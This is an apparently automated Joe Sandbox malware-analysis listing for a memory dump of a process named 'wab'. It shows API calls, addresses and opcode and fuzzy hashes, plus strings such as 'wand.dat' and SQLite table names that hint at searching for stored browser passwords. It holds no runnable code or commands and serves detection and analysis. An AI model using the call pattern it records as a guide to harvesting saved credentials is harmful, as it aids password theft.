• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID:
• API String ID: 1661045500-0
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
• memcpy.MSVCRT ref: 0042EC7A
Strings
• Cannot add a column to a view, xrefs: 0042EBE8
• virtual tables may not be altered, xrefs: 0042EBD2
• sqlite_altertab_%s, xrefs: 0042EC4C
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset
• String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
• API String ID: 1297977491-2063813899
• Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
• Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
• Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
• Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.*$dat$wand.dat
• API String ID: 2618321458-1828844352
• Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
• Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
• Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
• Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
• wcslen.MSVCRT ref: 00410C74
• _wtoi.MSVCRT ref: 00410C80
• _wcsicmp.MSVCRT ref: 00410CCE
• _wcsicmp.MSVCRT ref: 00410CDF
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmp$??2@??3@_wtoiwcslen
• String ID:
• API String ID: 1549203181-0
• Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
• Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
• Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
• Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00412057
  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
• SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
• GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
• GetKeyState.USER32(00000010), ref: 0041210D
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ExecuteMenuMessageSendShellStateStringmemset
• String ID:
• API String ID: 3550944819-0
• Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
• Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
• Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
• Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
Uniqueness
Uniqueness Score: -1.00%

APIs
• wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
• ??3@YAXPAX@Z.MSVCRT ref: 0040A908
• ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
• memcpy.MSVCRT ref: 0040A94F
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??3@$memcpy$mallocwcslen
• String ID:
• API String ID: 3023356884-0
• Opcode ID: 04d2dee96b5e0c3aea304ed2264281ba89f9e94ec92aede7506340a7c7d04724
• Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
• Opcode Fuzzy Hash: 04d2dee96b5e0c3aea304ed2264281ba89f9e94ec92aede7506340a7c7d04724
• Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
Uniqueness
Uniqueness Score: -1.00%

APIs
• wcslen.MSVCRT ref: 0040B1DE
• ??3@YAXPAX@Z.MSVCRT ref: 0040B201
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
• ??3@YAXPAX@Z.MSVCRT ref: 0040B224
• memcpy.MSVCRT ref: 0040B248
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3023356884-0
                                                                                                                                                                                                                      • Opcode ID: be216efb729f49d9b3453cff3a07ca29206f97cb50f4c40f8d3ab9401fa12aed
                                                                                                                                                                                                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be216efb729f49d9b3453cff3a07ca29206f97cb50f4c40f8d3ab9401fa12aed
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                                                                                      • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040B159
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1171893557-0
                                                                                                                                                                                                                      • Opcode ID: b35f5ae7fefd5d66d25ec59d6127a866c9c92b2d2e026b1e9a4331286ce66ec4
                                                                                                                                                                                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b35f5ae7fefd5d66d25ec59d6127a866c9c92b2d2e026b1e9a4331286ce66ec4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1127616056-0
                                                                                                                                                                                                                      • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: sqlite_master
                                                                                                                                                                                                                      • API String ID: 438689982-3163232059
                                                                                                                                                                                                                      • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414DF3
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: BrowseFolderFromListMallocPathwcscpy
• String ID:
• API String ID: 3917621476-0
• Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
• Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
• Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
• Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
• _snwprintf.MSVCRT ref: 00410FE1
• SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
• _snwprintf.MSVCRT ref: 0041100C
• wcscat.MSVCRT ref: 0041101F
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
• String ID:
• API String ID: 822687973-0
• Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
• Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
• Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
• Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
Uniqueness
Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7600DF80,?,0041755F,?), ref: 00417452
• malloc.MSVCRT ref: 00417459
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7600DF80,?,0041755F,?), ref: 00417478
• ??3@YAXPAX@Z.MSVCRT ref: 0041747F
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ByteCharMultiWide$??3@malloc
• String ID:
• API String ID: 4284152360-0
• Opcode ID: 0b7bfc55a2a68b0b8501ca6e60a43b9d2137669aaa69feff2bcc87c38bff4882
• Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
• Opcode Fuzzy Hash: 0b7bfc55a2a68b0b8501ca6e60a43b9d2137669aaa69feff2bcc87c38bff4882
• Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 00412403
• RegisterClassW.USER32(?), ref: 00412428
• GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
• CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: HandleModule$ClassCreateRegisterWindow
• String ID:
• API String ID: 2678498856-0
• Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
• Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
• Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
• Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,?), ref: 00409B40
• SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
• SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: MessageSend$Item
• String ID:
• API String ID: 3888421826-0
• Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
• Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
• Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
• Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00417B7B
• UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
• LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
• GetLastError.KERNEL32 ref: 00417BB5
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: File$ErrorLastLockUnlockmemset
• String ID:
• API String ID: 3727323765-0
• Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
• Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
• Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
• Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
• malloc.MSVCRT ref: 00417407
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
• ??3@YAXPAX@Z.MSVCRT ref: 00417425
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ByteCharMultiWide$??3@malloc
• String ID:
• API String ID: 4284152360-0
• Opcode ID: 216751ef8fd097c825dd04e316b9a1fd88e5245b1c8a55e2c2eb04db0303a8de
• Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
• Opcode Fuzzy Hash: 216751ef8fd097c825dd04e316b9a1fd88e5245b1c8a55e2c2eb04db0303a8de
• Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                      • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                      • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                      • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

